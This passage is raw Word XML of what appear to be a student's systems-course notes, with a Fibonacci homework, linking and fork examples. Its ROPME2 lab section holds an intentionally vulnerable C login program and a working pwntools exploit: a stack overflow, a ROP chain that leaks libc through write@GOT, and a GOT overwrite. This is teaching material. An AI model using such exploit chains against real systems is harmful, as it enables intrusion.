      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_50cdwl9a6jeb" w:id="36"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Homework3 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unsigned long long fibonacci(unsigned long long n) {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if(n == 0){</w:t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return 0;</w:t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} else if(n == 1) {</w:t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return 1;</w:t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} else {</w:t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return (fibonacci(n-1) + fibonacci(n-2));</w:t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 {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unsigned long long i;</w:t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unsigned long long n = 90;</w:t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printf("Fibonacci of %lld: \n" , n);</w:t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for(i = 0;i&lt;n;i++) {</w:t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printf("%lld ",fibonacci(i));</w:t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fflush(stdout);</w:t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}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printf("\n");</w:t>
            </w:r>
          </w:p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return 0;</w:t>
            </w:r>
          </w:p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gcc -o fibo fibo.c</w:t>
            </w:r>
          </w:p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Style w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_huscsbvj2ees" w:id="37"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pwntools </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000037D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https://github.com/Gallopsled/pwntools-tutorial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cp /lib/x86_64-linux-gnu/libc.so.6 .</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Style w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9cd91xsqtxi8" w:id="38"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ROPME2 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ropme2.c </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table5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&lt;string.h&gt;</w:t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&lt;stdlib.h&gt;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&lt;unistd.h&gt;</w:t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gift(){</w:t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__asm__ volatile (</w:t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"pop %rdx \n\t"</w:t>
            </w:r>
          </w:p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"pop %rsi \n\t"</w:t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    "pop %rdi \n\t"</w:t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);</w:t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secret(){</w:t>
            </w:r>
          </w:p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printf("Here is secret message for you\n");</w:t>
            </w:r>
          </w:p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login(){</w:t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char overflowme[32];</w:t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char password[32];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printf("Login : ");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fflush (stdout);</w:t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read(0, overflowme, 0x200);</w:t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 (!strcmp(overflowme, "root"))</w:t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{</w:t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if (!strcmp(password, "pa$$w0rd"))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{</w:t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printf("You are successfully logged in\n");</w:t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secret();</w:t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else</w:t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printf("Incorrect password!\n");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else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printf("Invalid user\n");</w:t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main(int argc, char* argv[]){</w:t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setvbuf(stdout, 0, _IOLBF, 0);</w:t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setvbuf(stdin, 0, _IOLBF, 0);</w:t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login();</w:t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write(1, "DONE\n", 5);</w:t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Makefile </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table5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ab/>
              <w:t xml:space="preserve">gcc -Wno-stringop-overflow -no-pie -fno-stack-protector -o ropme2 ropme2.c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 checksec ./ropme2</w:t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[*] '/home/nshc/moon/computer_system/07_debugging/ROPME2/ropme2'</w:t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Arch:     amd64-64-little</w:t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RELRO:    Partial RELRO</w:t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Stack:    No canary found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NX:       NX enabled</w:t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PIE:      No PIE (0x400000)</w:t>
            </w:r>
          </w:p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cyclic 100 | ./ropme2</w:t>
            </w:r>
          </w:p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gdb ./ropme2 core.ropme2.3347251</w:t>
            </w:r>
          </w:p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00:0000│ rsp 0x7ffef7da5618 ◂— 0x6161616c6161616b ('kaaalaaa')</w:t>
            </w:r>
          </w:p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cyclic -l kaaalaaa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40</w:t>
            </w:r>
          </w:p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python3 -c 'print ("A"*40 + "pppppppp")' | ./ropme2</w:t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 : Invalid user</w:t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Segmentation fault (core dumped)</w:t>
            </w:r>
          </w:p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secret</w:t>
            </w:r>
          </w:p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$1 = {&lt;text variable, no debug info&gt;} 0x401204 &lt;secret&gt;</w:t>
            </w:r>
          </w:p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\x04\x12\x40\x00\x00\x00\x00\x00</w:t>
            </w:r>
          </w:p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python3 -c 'print ("A"*40 + "\x04\x12\x40\x00\x00\x00\x00\x00")' | ./ropme2</w:t>
            </w:r>
          </w:p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Style w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_msrm8pw8937h" w:id="39"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Debugging </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table5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python3 -c 'print ("A"*40 + "\x04\x12\x40\x00\x00\x00\x00\x00")' &gt; input</w:t>
            </w:r>
          </w:p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run &lt; input</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000003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pwn import *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context.log_level = 'debug'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e=ELF("./ropme2")</w:t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#e=ELF("./ropme3")</w:t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io=process("./ropme2")</w:t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#io=process("./ropme3")</w:t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#io=remote("localhost", 31337)</w:t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libc=ELF("./libc.so.6")</w:t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input('&gt;')</w:t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debug = True</w:t>
            </w:r>
          </w:p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debug = False</w:t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 debug :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gdb.attach(io, gdbscript='''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b *0x4011a8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'''</w:t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3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input('ready')</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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--------------</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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gadgets</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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pppr    = 0x40117e</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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write   = e.plt["write"]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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read    = e.plt["read"]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bss     = e.bss(0x100)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write_got = e.got["write"]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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print(f"bss   = {bss:#x}")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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print(f"write = {write:#x}")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print(f"read  = {read:#x}")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print(f"read  = {read:#x}")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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= b"p"*40</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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p64(0x401204)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#p += p64(0x401224)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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io.send(p)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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io.interactive()</w:t>
            </w:r>
          </w:p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python3 expl1.py</w:t>
            </w:r>
          </w:p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ROPgadget --binary=ropme2</w:t>
            </w:r>
          </w:p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0x00000000004013a3 : pop rdi ; ret</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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Style w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_68mhv2ggqwru" w:id="40"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to debug interactive exploit code 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input(‘ready?’) # add this exploit script </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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gdb ./ropme2 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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attach 639311</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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pwndbg&gt; finish </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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 0x40125d &lt;login+66&gt;     lea    rax, [rbp - 0x20]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 0x401261 &lt;login+70&gt;     lea    rsi, [rip + 0xdc8]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0x401268 &lt;login+77&gt;     mov    rdi, rax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 0x40126b &lt;login+80&gt;     call   strcmp@plt                      &lt;strcmp@plt&gt;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   0x401270 &lt;login+85&gt;     test   eax, eax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   0x401272 &lt;login+87&gt;     jne    login+150                      &lt;login+150&gt;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0x401274 &lt;login+89&gt;     lea    rax, [rbp - 0x40]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0x401278 &lt;login+93&gt;     lea    rsi, [rip + 0xdb6]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0x40127f &lt;login+100&gt;    mov    rdi, rax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0x401282 &lt;login+103&gt;    call   strcmp@plt                      &lt;strcmp@plt&gt;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0x401287 &lt;login+108&gt;    test   eax, eax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$ ROPgadget --binary=ropme2 &gt; gadget.txt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Style w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bx1a81kk55xo" w:id="41"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">break 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4012bf:</w:t>
        <w:tab/>
        <w:t xml:space="preserve">c3                   </w:t>
        <w:tab/>
        <w:t xml:space="preserve">retq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pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vh5pr4cnsl6y" w:id="42"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit code 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from pwn import *</w:t>
            </w:r>
          </w:p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context.log_level = 'debug'</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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e=ELF("./ropme2")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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io=process("./ropme2")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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#io=remote("localhost", 31337)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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libc=ELF("./libc.so.6")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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input('&gt;')</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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debug = True</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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debug = False</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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if debug :</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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gdb.attach(io, gdbscript='''</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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b *0x4011a8</w:t>
            </w:r>
          </w:p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'''</w:t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)</w:t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input('ready')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--------------</w:t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gadgets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pppr    = 0x40117e</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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write   = e.plt["write"]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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read    = e.plt["read"]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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bss     = e.bss(0x100)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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write_got = e.got["write"]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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print(f"bss   = {bss:#x}")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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print(f"write = {write:#x}")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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print(f"read  = {read:#x}")</w:t>
            </w:r>
          </w:p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--------------</w:t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payloads</w:t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= b"p"*0x28</w:t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p64(pppr)</w:t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p64(0x9)       # rdx</w:t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p64(write_got) # rsi</w:t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p64(1)         # rdi</w:t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rbp</w:t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p64(write)     # leak 'write' function address</w:t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</w:t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p64(pppr)</w:t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p64(0x10)      # rdx</w:t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p64(bss)       # rsi</w:t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rdi</w:t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rbp</w:t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p64(read)      # read(0, bss, 0x10)</w:t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</w:t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p64(pppr)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p64(0x10)      # rdx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p64(bss)       # rsi</w:t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p64(1)         # rdi</w:t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rbp</w:t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p64(write)     # write(1, bss, 0x10)</w:t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</w:t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p64(pppr)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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p64(0x8)       # rdx</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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p64(write_got) # rsi</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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rdi</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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rbp</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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p64(read)      # read(0, write_got, 0x10)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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p64(pppr)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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p64(0x10)      # rdx</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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p64(bss)       # rsi</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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p64(1)         # rdi</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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p64(0)         # rbp</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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 += p64(write)     # write(1, bss, 0x10) -&gt; exit()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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 --------------</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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io.send(p)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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write_addr = u64(io.read(8))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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print(f"write_addr = {write_addr:#x}")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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libc.address = write_addr - libc.symbols['write']</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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print(f"libc = {libc.address:#x}")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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exit_ = libc.symbols['exit']</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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io.sendline(teamname)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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io.send(p64(exit_))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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io.interactive()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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_k0e5fn7tzsfl" w:id="43"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2023.11.17 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200461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20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Makefile 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4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gcc -o prog  mismatch-main.c mismatch-variable.c</w:t>
            </w:r>
          </w:p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widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mismatch-main.c</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table6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long int x; /* Weak symbol */</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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main(int argc, char *argv[]) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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printf("%ld\n", x);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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4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mismatch-variable.c</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table6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Global strong symbol */</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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double x = 3.14;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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Makefile </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table6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4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gcc -o a.out main.c foo.c</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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main.c </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table6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a = 1;</w:t>
            </w:r>
          </w:p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static int b = 2;</w:t>
            </w:r>
          </w:p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c = 3;</w:t>
            </w:r>
          </w:p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int c = 4;</w:t>
            </w:r>
          </w:p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foo();</w:t>
            </w:r>
          </w:p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printf("a=%d b=%d c=%d\n", a, b, c);</w:t>
            </w:r>
          </w:p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foo.c </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table6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a, b, c;</w:t>
            </w:r>
          </w:p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foo()</w:t>
            </w:r>
          </w:p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a = 5;</w:t>
            </w:r>
          </w:p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b = 6;</w:t>
            </w:r>
          </w:p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 = 7;</w:t>
            </w:r>
          </w:p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Style w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_j75slgecu19z" w:id="44"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2023.11.24 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Mid-Term result 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Makefile </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table6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 :</w:t>
            </w:r>
          </w:p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gcc -o fork fork.c</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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fork.c 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&lt;stdlib.h&gt;</w:t>
            </w:r>
          </w:p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&lt;errno.h&gt;</w:t>
            </w:r>
          </w:p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unix_error(char *msg) /* Unix-style error */</w:t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fprintf(stderr, "%s: %s\n", msg, strerror(errno));</w:t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exit(0);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pid_t Fork(void)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4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pid_t pid;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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 ((pid = fork()) &lt; 0)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unix_error("Fork error");</w:t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pid;</w:t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$begin fork */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$begin wasidefork */</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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5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5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pid_t pid;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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int x = 1;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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pid = Fork(); //line:ecf:forkreturn</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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 (pid == 0) {  /* Child */</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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printf("child : x=%d\n", ++x); //line:ecf:childprint</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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exit(0);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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5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/* Parent */</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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printf("parent: x=%d\n", --x); //line:ecf:parentprint</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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exit(0);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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$end fork */</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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$end wasidefork */</w:t>
            </w:r>
          </w:p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&lt;stdio.h&gt;</w:t>
            </w:r>
          </w:p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&lt;stdlib.h&gt;</w:t>
            </w:r>
          </w:p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#include &lt;errno.h&gt;</w:t>
            </w:r>
          </w:p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void fork5()</w:t>
            </w:r>
          </w:p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printf("L0\n");</w:t>
            </w:r>
          </w:p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 (fork() == 0) {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printf("L1\n");</w:t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if (fork() == 0) {</w:t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printf("L2\n");</w:t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printf("Bye\n");</w:t>
            </w:r>
          </w:p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 main()</w:t>
            </w:r>
          </w:p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fork5();</w:t>
            </w:r>
          </w:p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Style w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rm3fsh5286rd" w:id="45"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2023.12.01 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ssh -p 2222 C1234567@122.38.251.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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9">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">$ cp /home/public/10_network.tar.gz . </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005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tar xvfz 10_network.tar.gz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$ ls 10_network</w:t>
            </w:r>
          </w:p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  netp  src</w:t>
            </w:r>
